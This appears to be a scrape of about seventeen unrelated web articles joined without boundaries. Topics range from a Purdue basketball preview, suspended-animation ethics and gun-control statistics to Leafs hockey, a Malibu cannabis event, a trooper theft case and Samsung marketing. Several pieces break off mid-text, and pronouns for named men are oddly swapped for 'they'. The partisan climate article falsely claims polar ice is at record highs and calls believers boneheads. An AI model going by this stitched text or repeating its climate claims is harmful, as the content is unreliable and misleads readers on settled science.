Mathias has been really aggressive this tournament and will back down to no one in this game. Kansas may recognize their value though and really prioritize taking them out of their comfort zones beyond the arc. They'll have the physical gifts to do it. It's imperative that when Purdue's guards are made to put it on the floor, they make good decisions. There could be opportunities for Mathias to use their pull-up game.
Can death be useful? That's the central question of the quickly expanding field of suspended animation, the process of slowing the body's major processes as much as possible to induce a state that's very much like death without actually causing the patient to die.
What precisely we mean when we say “actually die” is a bit of an open question these days; in a world where we can often be resuscitated after long periods of brain death, the noun “Death” is probably best defined as, “Any state of zero brain activity from which a person will never be revived.” That's not particularly helpful, though; if a person is brain-dead next to a machine that could revive them, are they truly dead if the machine is broken and truly alive if it is not? Is death an absence of life, or an absence of any future potential for life?
Such questions used to be nothing but navel-gazing, but today represent concrete issues that could affect our lives in the every-day. With the recent onset of a trial for suspended animation technology, we have taken our first steps down a path with no end in sight. The trial will catch otherwise hopeless patients at the point of death (or potentially after), and swap out a large portion of their blood for a chilled, oxygenated saline solution. This quickly lowers the body to a chilly 10 degrees Celsius, which almost immediately induces a hypothermic state and lowers the metabolic rate to near zero. If cells aren't doing anything then they also aren't producing any of the metabolic products that normally build up to toxic levels without breathing and circulation. At this point, the question is not whether suspended animation is real but whether it's medically useful.
The field of suspended animation faced widespread skepticism for many years, but recent studies in pigs and a generally pro-futurism trend within science have led to a rather abrupt wave of professional acceptance. It mostly comes down to drastically reduced claims for the technology; rather than alienating everyday physicians and scientists with speculation about eternal life, suspended animation is now mostly about keeping terminal patients in a revivable state long enough to get them to machinery that can do the reviving. Many, many people die in ambulances, or military medevac helicopters, and these new attempts at “induced hibernation” could help those patients to get them the help they need.
Yet, there is simply no way we'll stop there. The trend will begin at NASA, DARPA, Calico, and other moonshot research organizations: how do we put healthy people into a hibernative state? Getting astronauts to Mars is probably possible without suspended animation, but a trip to Europa or Enceladus will be much harder; there's a reason that space-ships full of stasis pods are such a trope of science fiction, and not least of them is a crew's demands on power and consumables. But space isn't the only out-there application for suspended animation; not every prisoner at Guantanamo is an intelligence asset, so why keep useless prisoners conscious and complaining? And if you take the time to have an enemy combatant declared dead after combat, does that corpse still have rights if you revive it later?
Right now the research only really implies that suspended animation can be safe on the order of hours, but there's every reason to believe that a stasis nap could safely last weeks or months, and years aren't such a crazy idea either. We are about to start allowing people to pay to feel out the borders of death. People will “freeze” themselves even in absence of any plausible future cure for their fatal problem; if you can afford to do so, why wouldn't you?
This technology will force us to ask tough questions about society: Does the word “death” mean something different for rich people than for the poor? Do we declare a patient as “dead” depending on whether they can afford to stay in stasis until some projected cure date? In this dystopia, a market crash could wipe out savings accounts and switch thousands of suspended patients from “Long Term Pre-Mortal Stasis” to “Med School Cadaver In Waiting.”
People in suspended animation will have cloudy and nonspecific rights, and may ask us to deal with some pretty heavy moral quandaries. I genuinely don't know how I would deal with a situation in which poor families are saddled with insupportable fees to keep their loved ones in stasis — especially if a cure really could be near.
Then there's financial inheritance. People will certainly be less inclined to leave savings to their children if they might one day wake up and need those funds again — would you trust your children to handle that money well? Pig studies have shown that suspended animation likely won't affect memory or cognitive ability, so when you awaken after 5 years under, do you get to go back to your old job? Are your children still yours, or do they belong to the God-parent who took them in after your “fatal” car accident?
Our society is built on a foundation of certain reliable truths, but technology is increasingly calling those assumptions into question. We must begin to grapple with the effects that such low-level renovations will have, and we need to do it in forums less specialized than futurist think tanks and sci-fi discussion boards. The wider public needs to talk about these issues now, to decide how it feels about any possible future Terry Schiavo's before it encounters them. Unfortunately, associations with science fiction make it impossible for many people to take the topic seriously, so that doesn't seem likely to happen any time soon — and in this case, soon is all the time we've got.
The Pokémon Company International announced on Monday that the Pokémon the Movie: Hoopa and the Clash of Ages will premiere on Cartoon Network on Saturday, December 19 at 6:00 p.m.
In addition, the prequel short, "Hoopa: the Mischief Pokémon," and the "Hoopa's Surprise Ring Adventures" short specials are available via Pokémon.com or the Pokémon TV app.
The film will air as part of a two-film special beginning at 3:30 p.m. EST. The television guide website Zap2it lists the first film as Pokémon: Arceus and the Jewel of Life.
The film premiered in Japan on July 18 and on Canada's Teletoon on November 14.
The Pokémon Company describes the film's story:
The 70-minute animated movie takes Ash, Pikachu, and their friends to a desert city by the sea. Here they meet the Mythical Pokémon Hoopa, which has the ability to summon things—including people and Pokémon—through its magic rings. After a scary incident, they learn of a story about a brave hero who stopped the rampage of a terrifying Pokémon long ago. Now, the threat that has been bottled up for years is in danger of breaking loose again! Can Ash help their new friend overcome the darkness within…or will a dangerous secret erupt into a clash of legends?
The Pikachu to Pokémon Ongakutai (Pikachu & the Pokémon Music Band) anime short screened before the film when it premiered in Japan.
A Pokémon XY & Z feature film will premiere in Japan on July 16, 2016.
Iain Overton is director of investigations at the London-based charity Action on Armed Violence, and author of The Way of the Gun: A Bloody Journey into the World of Firearms.
Do more gun kill more people? This is the million-dollar question that will be at the centre of much commentary following the recent horrors in Orlando, Fla.
One side of the U.S. debate will focus on the argument raised by President Barack Obama – that there needs to be "common sense" gun regulation to stop would-be mass shooters from getting their hands on guns. The other side will argue, as they always argue, that if only there had been more guns in that gay nightclub, they would have had fewer deaths that night (ignoring the fact that if you allowed nightclubbers, with easy access to drink and drugs, to have easy access to guns, the results would be catastrophic).
Story continues below advertisement
To many outside the United States, it seems logical that more guns, indeed, result in more gun deaths. In a country like Japan, where it's hard to own a gun, there are virtually no gun deaths. In the United States, where there are more than 300 million firearms, 8,855 people were shot and killed in 2012 (and guns account for about 70 per cent of all homicides).
However, to be able to show conclusively that more guns lead to more gun deaths is harder. A host of factors comes into play when looking at cause and effect; levels of poverty, the rule of law, the number of criminal gangs operating and more. It results in hard-to-explain situations as in Iceland, where there is a very high ratio of gun owners and yet virtually no gun crime.
Such an inability to prove cause and effect lies at the heart of the American gun-control debate. In the absence of proof that guns take, not save, lives, the National Rifle Association pushes back against gun control. Take away our guns, the mantra goes, and you take away our liberty.
Elsewhere, though, when it comes to gun control, what seems to be the sensible thing to do, not hard proof, has won the day.
Twenty years ago – on March 13, 1996 – a tragedy of such sorrow unfolded in the Scottish town of Dunblane that it still has the power to shock today. Thomas Hamilton, a 43-year-old former Scout leader, walked into a primary school with four legally held handguns and killed 17 people, wounding a further 15. Sixteen of the dead were children.
The ensuing debate was to focus on gun-control laws, including massive public petitions calling for a ban on the private ownership of handguns. In response to this, two new firearms acts were passed. They effectively made private ownership of handguns illegal in Britain.
So the question is this: Did the British response to Dunblane work?
Story continues below advertisement
Story continues below advertisement
Gun homicides in England and Wales had risen to 66 in 1994 from 26 in 1969. In the year of Dunblane, gun deaths peaked at 84 across Britain. Today, gun killings have dropped to almost a third of that. In England and Wales in 2012-13, the police recorded 30 gun homicides, 12 fewer than the previous year and the lowest figure since the National Crime Recording Standard was introduced in 2002. Given that Britain's population is about 10 million greater than it was in the early 1960s, it seems that the gun controls worked.
It would be wrong, though, to say so conclusively. Britain does not have data sets over time recording how many people survive being shot. Lower mortality figures might just be modern medicine getting better at saving lives. And, of course, Derrick Bird 's killing of 12 people in 2010 in England with a .22-calibre rifle shows that no gun control outside of a total ban is ever going to stop gun deaths.
However, it seems likely that the gun control that resulted from Dunblane has worked. In 2012-13, there were just over 8,000 firearm offences in England and Wales. Knife crime was more than three times that. Of the gun offences, more than half were with air guns or imitation weapons.
The biggest signifier of change, though, might be the role of handguns in crime since Dunblane. In England and Wales in 2012, only 28 per cent of all criminal use of guns involved handguns. They were actually fired in just 11 per cent of these cases – about 250 times.
Compare this with the situation in the United States. In 2012, handguns accounted for about 90 per cent of all firearm homicides where the gun type was recorded.
We can only look at such figures and make our own judgments, and what these will be been deeply influenced by our cultural and societal roots.
Story continues below advertisement
The United States, with its constitutional right to own a gun, is the only country in the world where they have loosened, not tightened, gun laws after a massacre. Their response to Dunblane would, likely, have been to arm teachers or to provide children with bulletproof blankets to hide under. Such a solution would have been met with ridicule in Britain. Instead, Britain opted for no handguns and, so far, no more school massacres have occurred.
Perhaps, as we grieve those who lost their lives in Orlando, it would be worth remembering the lessons learned from other mass shootings farther afield.
A museum of water? This is the improbable concept featuring in this year's Perth International Arts Festival. The brainchild of British artist Amy Sharrocks, the Museum of Water intends to trace the manifold ways that people relate to water.
People are invited to bring water that is significant to them in a container and donate it to the museum. The water is then “archived”, the details of the donor and the provenance of the water are recorded, and the donor is interviewed about the particular significance of the water they have donated.
Although the project began in the UK, its passage to Australia introduces a rather different set of relationships to water than those that prevail in northern Europe. The fact that Australia is, by and large, a dry continent has done much to condition life here. In particular, as Michael Cathcart has shown in The Water Dreamers: The Remarkable History of our Dry Continent (2010), human societies in Australia have had to contend in many cases with the lack of water and adapt to its scarcity.
In Western Australia, the problem of water is particularly acute as no major rivers flow in the south-west where the majority of the population is concentrated. The difficulties of sustaining an increasing population in the absence of ready sources of freshwater were recently explored in Running Out? Water in Western Australia (2015) by the environmental historian Ruth Morgan.
All of this added a particular piquancy to the Museum of Water when it arrived in WA this month. These thoughts were in my mind when I went to Cottesloe Beach last Sunday to donate my sample to the Museum. I had collected the water last month when I had visited the granite outcrop known as Wave Rock in the southeastern wheatbelt of Western Australia.
Wave Rock is about 350 km south east of Perth and a popular destination for day-trippers. I travelled there with the poet John Kinsella, who lives in the wheatbelt and loves its contradictory beauties. For my part, I have spent the last decade writing a literary history of the wheatbelt in a book I've called Like Nothing on this Earth.
Wave Rock was an important source of permanent water for the Noongar people of the southwest, and as the wheatbelt expanded, the run-off from the extensive exposed granite surfaces of the rock was channelled into a reservoir for the farmers near Hyden. Near the rock are salt lakes that form naturally in the faint depressions of an overwhelmingly flat landscape. It is from one of these that I drew the water and a small piece of driftwood furred with fine gypsum crystals.
Tony Hughes-D'Aeth , Author provided
I told this story, along with the other donors who I was grouped with, to Mei Swan Lim, who was recording our interviews. There was also Elizabeth who brought water from their childhood home in Safety Bay south of Perth where they grew up in the 1950s and ‘60s. The water from Safety Bay held the associations of their childhood together. Playing in the dunes, their mother's home-made orange cordial, the simple solidarity of childhood friendships.
Mike and Hanni donated water from close-by North Cottesloe where they swim each day together. Hanni had grown up in Jakarta and the reef-enclosed pools of North Cott gave them a chance to learn to love an ocean that seemed a world away from the city of their childhood.
So, is the Museum of Water really a museum? Or, is it a community art-project, or an exercise in oral history? In fact it is all of these things. The donations of Elizabeth, Mike and Hanni, and I are items 798, 799 and 800 in the Museum's WA collection. At the conclusion of the festival the water collected will become part of the Western Australian Museum's permanent collection and be stored for posterity.
Collecting the water, bringing it along, and explaining why it mattered to me was a surprisingly powerful experience. In a place where water is so precious, there was a quiet solemnity to the Museum of Water that seemed to perfectly capture the way that water is both an everyday banality and a sacred element.
The Museum of Water will feature at the Perth International Arts Festival until March 5.
Tony's book, Like Nothing on this Earth: a Literary History of the Wheatbelt, will be released in March.
Two New Zealand ISPs have reported falling traffic after that nation's controversial new "three strikes" copyright enforcement legislation went into effect at the start of the month. Kiwi Internet users may have been spooked by the threat of fines as high as NZ$15,000.
The New Zealand ISP Orcon has said that international traffic into New Zealand has dropped by about 10 percent since last week. Speaking to to the New Zealand Herald, Orcon's chief executive Scott Bartlett said that peer-to-peer file sharing represents the second-largest source of traffic after video streaming.
TelstraClear, another major New Zealand ISP, has also reported a drop in traffic, although a spokesperson said they aren't sure if it was related to the new copyright law. A third firm, Telecom New Zealand, says it hasn't noticed a drop in traffic.
These reports suggest that the fall in traffic in New Zealand has been modest, especially compared to the plunge in Internet traffic that was observed in Sweden the day a tough new Swedish copyright bill took effect. Swedish traffic fell by about 30 percent the week after the Swedish law went into place, and it didn't regain its previous levels for another six months.
The New Zealand law was passed earlier this year, and places the burden of proof on accused file-sharers; repeat offenders can face fines of up to NZ$15,000. The government also has an option to impose Internet disconnections of up to six months as a penalty for repeat infringement.
New Zealand network operators say they have yet to receive any complaints under the new "three strikes" system, but they expect complaints to start rolling in soon.
In June, the New Zealand government signed a statement condemning "three strikes" policies that deprive copyright infringers of Internet access, calling such laws a violation of human rights.
Environmentalists claim that climate change deniers destroy the environment for profits or material gains, not caring about future generations. While that's completely wrong and a mischaracterized assessment, it doesn't stop hypocritical liberal elitists from getting wealthy off the backs of the boneheads that actually fall for the climate change hype. In fact, it makes them even richer, and you won't believe the money they have made.
Earlier this week, the federal government surprisingly took down a green group that managed to take about $1.4 million from taxpayers in an energy scheme designed to prey on those who won't look past the “global warming” deception to the facts about its minimal effects. Three of the worst offenders deserve to be called out directly for using the clueless liberals, who they pretend to protect. They take money from the misinformed, and these deceivers become increasingly wealthy.
Al Gore tops the list, although this isn't surprising. Almost none of the over-hyped dramatic scenarios presented by Gore have actually come true. In fact, not only do we still have polar ice, the amount of ice at the poles is more now than it ever has been before, and it's constantly hitting new records.
Gore's wealth went from $700,000 in 2000 to an estimated net worth of $172.5 million by 2015 thanks to their environmentalist activism. Gore and the former chief of Goldman Sachs Asset Management made nearly $218 million in profits between 2008 and 2011 from a carbon trading company they co-founded. By 2008, Gore was able to put a whopping $35 million into hedge funds and other investments.
Elon Musk is the type of billionaire who liberals often rail against, while being just dumb enough to keep funding them and making them wealthy, all while crying about wage gaps and losing more of their money. It would be funny if it wasn't so sad.
But let's move on to liberal hero, Warren Buffet. Another billionaire that the left should claim to hate for hoarding wealth. They have also preyed upon those who don't have the brains to read the data about “climate change” or “global warming” or whatever we are calling it this week. Buffet was instrumental in lobbying the Nevada state government to revise net-metering rules to help utilities.
That single policy change caused rival billionaire Elon Musk to lose roughly $165 million in a single day. It's liberals attacking liberals, but they are billionaires and global warming alarmists, so all is forgiven. As long as a leftist gets their free college and single-payer healthcare, who cares about anything else?
These men represent everything liberals claim to hate: wealth, owning things, not paying their “fair share,” making money, and scamming others to do it. While these are only three of the many wealthy people getting rich off the stupidity of liberals, there are dozens more out there scamming them as well, all in the name of environmentalism.
It's nothing new for liberals to be outed as hypocrites, and that can be seen just watching 15 seconds of a Democrat debate. But these liberals get rich by using the arm of big government and preying on the emotions of their own. So, who's really fear-mongering?
They pad their pockets by regulating businesses and civilians, all in a fake alarmist global warming scheme that's leaving American liberals penniless. Some men just want to watch your money burn, while they have the match in one hand and the water you think you desperately need in the other, but don't worry, they'll sell it to you for the right price.
H/T [Daily Caller]
When Brendan Shanahan was introduced as the new President of the Toronto Maple Leafs, it was met with skepticism and the focus centered on Tim Leiweke's consistent reiteration of the word “culture.”
Conversely, Shanahan's focus was not on buzzwords of culture change, or calls to arms, but a methodical approach to assessing and addressing the needs of a team that has very good parts but ultimately is a poorly built team. “I'm not here today for big speeches, big words, big proclamations; None of that matters. Wins do,” Shanahan said at the time.  They are right, wins are what matter. But on second look at that press conference, it was maybe a bit more revealing than given credit for. “I do like a lot about this group. There are some good pieces a lot of teams would covet,” Shanahan told everyone. “You start to look at making improvements in small increments,” they said, alluding to their offseason plan quite accurately. The Leafs were simply “not deep enough,” Nonis added. In Elliotte Friedman's last '30 Thoughts' of the season, they too noted that: [pull_quote_center]28. One of Toronto's players said it was very clear after the season the organization wants to even-out everyone's ice time, both up front and on defence. The feeling was a number of critical players — Phil Kessel, Dion Phaneuf, James van Riemsdyk — hit the wall.[/pull_quote_center] So far, the Leafs have stuck to the script. Earlier in the summer, I wrote about the Leafs bottom six and their lack of production, specifically when it came to the third line.
In a nutshell, it said:
The Leafs third line had the worst points per game in the league compared to other third lines.
The bottom six couldn't help kill penalties.
The bottom six couldn't help protect a lead, in which the Leafs led the league in blown third period leads.
The bad penalty kill and inability to protect a lead don't fall solely on the bottom six, but in the big picture they couldn't help offensively, defensively, or on special teams. There is no nice way of saying that. That is how the Leafs ended up having three forwards in the top 12 of average time on ice (for forwards) in the league. The only other team in the league to have three forwards average 20+ minutes of ice time per game was Vancouver, and only 29 forwards in the entire league averaged 20+ minutes. To say nothing of JVR and Kessel playing in the Olympics, too. The second line had two 20+ goal scorers, and nearly a third (Raymond had 19). Both Lupul and Raymond are listed as left wingers on NHL.com, and they both finished in the top 30 at that position in ice time. They each would have finished in the top 30 as right wingers as well. This is getting magnified to really make it clear how bad the Leafs bottom six was, how much they relied on their top players because of it, and to highlight how the Leafs ran their top forwards right into the ground.
Their top six across the board, as illustrated, played a huge amount. Shanahan, true to their word about the team having good pieces — and to Nonis' point about the lack of depth — has so far gone about reconstructing the rest of the roster around “the core,” which includes Kessel, JVR, Lupul, Kadri, Bozak, Phaneuf, Gardiner, and Rielly, with Bernier and Reimer in net.
Last season, Kulemin led the Leafs bottom six in scoring with 20 points. New additions Mike Santorelli and Daniel Winnik both topped that, Booth had one less point, Holland was on pace to beat 20 points, while Frattin, Komarov and even Bodie have flashed the ability to be at least reasonable contributors. In fact, if you combine Winnik's 30 points, and Santorelli's 28, they total more points than the Leafs most played entire bottom six based on games played (Kulemin, McClement, Clarkson, Bodie, Orr, Holland combined for 51).
That is why, despite a lack of big moves to help boost the team and ignite the fan base, there is reason for optimism heading into next season. As per James Mirtle, the team got rid of six of their worst eight possession players. Every forward they have added has a history of strong underlying numbers, but beyond that they all bring different elements and styles to a bottom six that last year sorely lacked any sort of contribution to the team. Leo Komarov draws penalties and is excellent on the forecheck, David Booth works the walls and drives the net, Mike Santorelli is very fast and a dog-on-a-bone on loose pucks (similar to former Leaf Dominic Moore), Winnik is strong defensively and a big body, while Matt Frattin adds a big shot, physicality and speed. Peter Holland adds more size and skill. These are not the big and flashy names fans were hoping for to make a big difference, but it is hard to imagine they don't significantly boost the worst bottom six in the league to at least the middle of the pack. And that is a big addition.
It has gone under the radar, but Shanahan has basically cleaned house—save for making any headline grabbing moves. There were 25 players that played at least 10 games for the Leafs last year and ended the season as a Leaf or Marlie, and 13 of them—over 50%—are either out of the organization entirely, or appear on their way to the Marlies for the start of next season. To date, six forwards and two new defensemen have been acquired. Three assistant coaches have been fired, two long-time management members, and Kyle Dubas and Peter Horachek have been brought in while Steve Spott has been promoted. All three have strong recent histories that suggest the Leafs just got a whole lot smarter and methodical in their approach, which will have a systemic trickle down effect to the on-ice product.
The reality is that all Leafs Nation is on a completely different timeline than Brendan Shanahan. They just got here.  They are trying to evaluate every corner of the organization. With everything that happened and what they lacked last year, it makes it extremely difficult to evaluate the core that many wanted blown up or at least altered, because they had no support. With the pieces put in place they can now do that. Provided the new additions fit in and contribute – and there's more reason to believe they will than won't — the eyes are all geared towards the core players now to step up and deliver. “This is the time for me to start learning about the organization from top to bottom,” Shanahan said in their introductory press conference. “It's a time for me to listen, to learn and get to work. That's all that's really worked for me in my career. That's what's worked for me when I was done playing hockey and that's what I intend to do here.”
With a handful of cheap, solid, productive acquisitions, and a revamped defense, they now have the opportunity to focus on the top of the roster properly and take the next step in their plan. The core players, Carlyle, and Nonis are all on the hot seat now, but at least they have an opportunity to succeed with what has been done. It is up to them to seize it now in conjunction with a solid supporting cast. “When I first started in Detroit, they weren't the team they are,” Shanahan said about the once maligned and comically laughed at organization. “Sometimes success is just around the corner.” There is reason now to believe that might just be the case.
A few interesting notes I have been sitting on:
The Emerald Exchange is a unique, up and coming cultural event offering a truly elevated experience, showcasing world-class, sun-grown cannabis from Northern California's most elite cultivators and artisan hash makers. Following a Farmer's Medicine Market and concurrent speaker series on issues effecting our community will be a sunset cocktail hour followed by an infused high-end dining experience topped off by music and dancing courtesy of DJ Dan.
Hosted on a secluded private property in Malibu, CA with breathtaking views and the lush natural setting of the Malibu Mountains, this event will forever change the way cannabis events are viewed.
The Exchange Includes:
Speaker Series featuring Donnie Anderson, Bianca Green, Justin Calvino and more!
Special Activations by True Humboldt and Pacific Wholesale Network
A delectable, infusion optional culinary experience with Chef Joshua Fisher
Dance the night away with the funktastic DJ Dan and Fleetwood Smack
A portion of the proceeds will be donated to support CannaKids
*Tickets are limited and will not be available day of the event. Extra guests will not be allowed in.
*Current valid Photo ID & Medical Card required at check-in. Patients must join the organizing collective upon arriving prior to entrance. Even with confirmed payment, patients will not be admitted in without proper documentation.
*The event will be held in Malibu, CA. Parking information will be sent by email 24 hours before event.
*Carpooling, Uber and Lyft HIGHly encouraged.
*If you do not currently have a medical recommendation for cannabis, follow this link and speak to a doctor to find out if one is right for you: http://bit.ly/2eJMFtd
Conservationists continue efforts to close Coffs Harbour's Dolphin Marine Magic
Updated
The former NSW Premier Bob Carr has thrown their support behind a campaign to end dolphin captivity in Australia.
The Australia For Dolphins "Show's Over" campaign is initially targeting the Coffs Harbour 'Dolphin Marine Magic' park.
We are hoping to phase out the use of dolphins in entertainment and start a more humane approach Angie Plummer, Australia For Dolphins
The group's spokesperson Angie Plummer said a clause has been left out of the current state legislation which lets dolphins born in captivity, be kept in captivity.
They said the laws must be tightened.
"This isn't the first time that politics has become involved in the issue," they said.
"In 1985 there was an Australian Senate report that found that captive dolphins in Australia suffer extreme stress and behavioural abnormalities.
"It recommended that dolphin captivity be shut down and here we are 30 years later still breeding dolphins for entertainment.
"So Bob Carr has come on to try and help us amend that."
Miss Plummer said they would like to see the Coffs Harbour park close, where animals perform for tourists in chlorinated pools.
"The Show's Over campaign aims to introduce legislation starting in NSW where the controversial Dolphin Marine Magic park is located, to end dolphin captivity in Australia," they said.
"We are hoping to phase out the use of dolphins in entertainment and start a more humane approach.
"That would involve introducing wild 'sea pens' where dolphins can be rehabilitated."
Management of Coffs Harbour's Dolphin Marine Magic said the push for wild sea pens needs more thought.
Chief Executive Officer Paige Sinclair said most animals live happily in captivity.
They said it is difficult to know who would pay for the sea pens.
"Sea pens would be a great idea if someone was willing to fund it," they said.
"A sea pen is going to cost millions of dollars you still need people to look after these animals, feed them, care for them and how's all that going to be funded.
"The other problem with sea pens is you have no control over the environment if there's an oil spill or pollution in the area or algae blooms you have absolutely no control over the environment for these animals."
Ms Sinclair said they would like Bob Carr to inspect the Coffs Harbour operation.
"I haven't spoken with Mr Carr and I don't believe he's come to the park," they said.
"I would invite them to come to the park and have a look and see what we do.
"He's only got one side of the story and as we know there's always three sides, there's somewhere in middle which is what I am going to call compromise."
Topics: animals, conservation, regional, coffs-harbour-2450, port-macquarie-2444, lismore-2480
First posted
Small churches are friendlier, while large churches have better publicity and higher sermon quality, according to the results of a church marketing project that uses unchurched mystery guests to rate church programs and atmospheres.
Local community members who don't usually attend church visited more than 4,000 churches over six years and rated them on 16 categories, from community awareness, greetings, and music to diversity and youth ministry programs. Faith Perceptions, which has more than 13,000 mystery guests in all 50 states, spearheaded the study and paid community members $45 to participate.
They found that churches with fewer than 80 people in attendance often don't do well with children's ministries or having information available (think updated website). But they lead the pack in greeting guests upon arrival, the pre- and post-service atmosphere and friendliness.
Megachurches, which are often aimed at the unchurched, fared best. Churches with 1,000 members ...
1
Gold was first discovered in the area in late 1848 or early '49. Located in the Sierra Nevada east gold belt district, the neighboring areas of Skull Flat, Bummerville, Pioneer Station, and Buckhorn were also extensively mined during the Gold Rush.
The camp was originally known as Indian Gulch, becoming West Point by 1854. The streams and surface ores in the area were mined first, followed quickly by quartz mining. There were numerous easily worked small ledges in the area, and the place came to be known as a poor man's camp as few tools were needed to do the mining. The area also became quite famous as a rich pocket mining district, where large amounts of gold could be uncovered in a matter of hours.
Two ditches were constructed during the 1850's to bring water into the diggings. One came from Bear Creek, the other from the North Middle Fork of the Mokelumne River. Even with water available, the town suffered from several terrible fires during its early years.
According to local tradition, the camp took its name from the legend that Kit Carson, while guiding John C. Frémont's second expedition in search of a pass through the Sierras, reached this spot in February of 1844 but could go no farther. Traveling down the south side of the Mokelumne River canyon, they found the river at flood stage, impassable, and was forced to turn back. As this was the farthest point west they had reached, the legend claims they named the spot West Point.
West Point is located northeast of Mokelumne Hill on Hwy 26.
Step into a worship service at Epiphany Church in Lower Greenville on a Sunday morning and you'll smell incense, see candles and hear ancient prayers read in unison. Sermons align with the Revised Common Lectionary, and church activities are planned around the liturgical year.
All of these are trappings of a liturgical church, but Epiphany is not Catholic, Anglican or Eastern Orthodox. Epiphany is a start-up planted by an evangelical megachurch and its pastor, Kurtley Knight, a graduate of George Fox Evangelical Seminary. Epiphany is a new kind of hybrid: an evangelical church that orders its services around liturgical practices.
Liturgical practice is a growing trend among evangelical churches. Last month, one of the largest evangelical megachurches in Texas, The Village Church where more than 10,000 people attend every week, announced it would order worship around the church calendar, observing Advent, Epiphany, Lent, Easter and Pentecost.
Pastors and professors see the trend as a response to other trends, both inside and outside church, and as an opportunity to overcome barriers that have divided Christians for centuries.
"I think it speaks to a lack of rootednesses in our culture," Knight said. "It ties you into something that is lasting, trustworthy. And that touches a nerve in our culture."
I wasn't sure if I could fit the weekend's two biggest news stories into one comic, but I did it! As I'm sure you all know by now, over the weekend Southpaw Regional Wrestling was finally released! Also an old video of Paige, Xavier Woods, and Brad Maddox involved in sexual congress was hacked and put online. There's no doubt that it's terrible for all of the people involved, but honestly I'd be surprised if WWE did anything about it other than keep them off TV for a few weeks. WWE didn't do anything to Hogan (who wasn't fired until their racial epithets were revealed) or Seth, so I think it would be hard to dish out any punishment out now. Yes, I know there are graphic photos involved (I'm not going into detail here, you can google it if you're interested), but it was a long time ago and since Paige is out with an injury and Brad's long gone, I'm hoping for the sake of the wrestlers that WWE just looks past this one.
You've probably heard many times that waking up early will ensure you enjoy a productive day. Some of the most accomplished people swear by their early wake-up times and packed morning routines, suggesting that setting the alarm clock ahead could be the secret to success. However, Jon Levy, behavioral scientist and author of The 2 AM Principle, argues the opposite, writing in Inc. that waking up at 5 a.m. could be what's actually hurting not helping your productivity.
For starters, Levy cites circadian neuroscientist Russell Foster's assertion that there is no research that proves waking up early makes you more productive. On the contrary, there is evidence that not getting enough sleep can reduce your happiness. A Gallup poll found that getting more sleep is linked to higher well-being and getting enough sleep is the number one factor on the list for what makes people happiest.
Michael Breus, PhD, nicknamed The Sleep Doctor, asserts that individuals fall into one of four chronotypes that dictate the best time for them to wake up. "Our biology influences what times of the day we are most productive," writes Levy of Breus's work. "The overwhleming majority of all people are not built to consistently wake up at 5 a.m. As their third point, Levy cites how studies have found that sleep deprivation mimics intoxication, making you more irritable, less functional, and certainly less productive.
So unless you're biologically wired to be an early riser, set your alarm to a time when your body feels ready to start the day (and still get to work on time). There's no use in forcing yourself to adopt a schedule your internal clock resists, only to crash later on down the line.
To actually boost your productivity, remove this one thing from your morning routine once you do get up.
Former trooper wants to go on trial for theft
Former Connecticut State Police Trooper Aaron "AJ" Huntsman turned down a plea bargain on Tuesday, Nov. 12, 2013 and instead told Superior Court Judge Richard Arnold they wanted a trial. Former Connecticut State Police Trooper Aaron "AJ" Huntsman turned down a plea bargain on Tuesday, Nov. 12, 2013 and instead told Superior Court Judge Richard Arnold they wanted a trial. Photo: Unknown, File Photo Photo: Unknown, File Photo Image 1 of / 1 Caption Close Former trooper wants to go on trial for theft 1 / 1 Back to Gallery
BRIDGEPORT -- The Scalesse family came to court Tuesday hoping to see former State Police Trooper Aaron "AJ" Huntsman finally admit they stole their son's gold chain and money as they lay dying on the Merritt Parkway last year.
They left disappointed.
"I was hoping it would be all over today but they (Huntsman) is still refusing to take responsibility for their actions," said a dejected Marguerite Scalesse. "Now they want to go on trial, but I'm confident justice will be done."
Huntsman, 43, a 19-year veteran of the state police, turned down a plea bargain that would have led to them serving one year in prison and instead told Superior Court Judge Richard Arnold they wanted a trial. The judge then continued the case to Dec. 17.
"The deal is now off the table," Assistant State's Attorney Marc Durso told Huntsman's lawyer, Ryan McGuigan.
If Huntsman goes to trial and is convicted, they could face up to 10 years in prison.
Neither Huntsman nor McGuigan would comment as they left the Golden Hill Street courthouse.
Huntsman is charged with two counts of third-degree larceny, and one count each of interfering with police and tampering with evidence.
Huntsman is accused of stealing $3,700 from 49-year-old John Scalesse on Sept. 22, 2012. Scalesse, a former executive of JAS Masonry in Milford, was killed after their motorcycle crashed into a construction company truck on the northbound section of exit 44 on the Merritt Parkway in Fairfield.
State police said Huntsman has maintained their innocence even after they were shown a video of them taking the money that was captured on the dash camera of their own police car.
The arrest warrant affidavit states that Huntsman, who was the first trooper at the crash scene, walked over to where Scalesse lay, bent down and picked up Scalesse's gold chain from a pool of blood. Later, Huntsman told Scalesse's grieving father that they didn't see any money on the victim.
State police later found the cash held with a rubber band under the front seat of Huntsman's cruiser.
Following their arrest, Huntsman spent two weeks in a drug rehabilitation center for a claimed addiction to pain medication, court records show.
"I'm absolutely appalled they (Huntsman) is taking no responsibility for this horrendous thing they have done to John," said Scalesse's fiance who would only give their name as Lisa.
Huntsman did agree to allow the victim's chain and money to be photographed so that it could finally go back to Scalesse's family.
dtepfer@ctpost.com; 203-330-6308; http:// twitter.com/dantepfer
Samsung Changed Their Brand Marketing Strategy After the Galaxy Note 7 Debacle
The Galaxy Note 7 battery issue that Samsung faced last year was something that impacted just about every aspect of their mobile division. Many hoped that it was going to be fixed very quickly but sadly it didn't work out that way. The company is actually going to attempt to re-release the device this year in what I can only assume is an attempt at getting rid of pre-built and unsold hardware components that they had laying around.
This issue caused Samsung to evaluate a number of their hardware manufacturing facilities in an attempt to prevent this from ever happening again. The Galaxy S8 is doing well and is definitely not plagued by the same battery issue, so it's safe to say they have done a good job at making sure that hardware issue didn't happen again. Hardware departments aren't the only part of the company that had to change, though, and Samsung's United States CMO talks about their change in marketing strategy.
Marc Mathieu spoke at Cannes Lions Festival this month, and says they would not wish what they had to go through on any marketer. So Samsung's marketing team immediately started putting together groups of consumers who wanted to give their input on the Samsung brand. Because remember, it wasn't just the Galaxy Note 7 that was catching fire last year. The company also had to deal with their top loading washing machines catching fire and exploding.
Instead, Samsung needed to shift their marketing focus to what Mr. Mathieu says was an attempt to humanize the brand. The whole goal was to focus on brand trust (which we saw from many publicly released statements from the company) and then try and rebuild an emotional relationship with their customers. It's certainly not finished by any means, but the sales reports of the Galaxy S8 are a sure sign that people are not worried about an exploding battery anymore.
Political party finances: the public's right to know
R2K submission to Parliament's Ad Hoc Committee on the Funding of Political Parties – 21 July 2017
Download the submission as a PDF here
Introduction
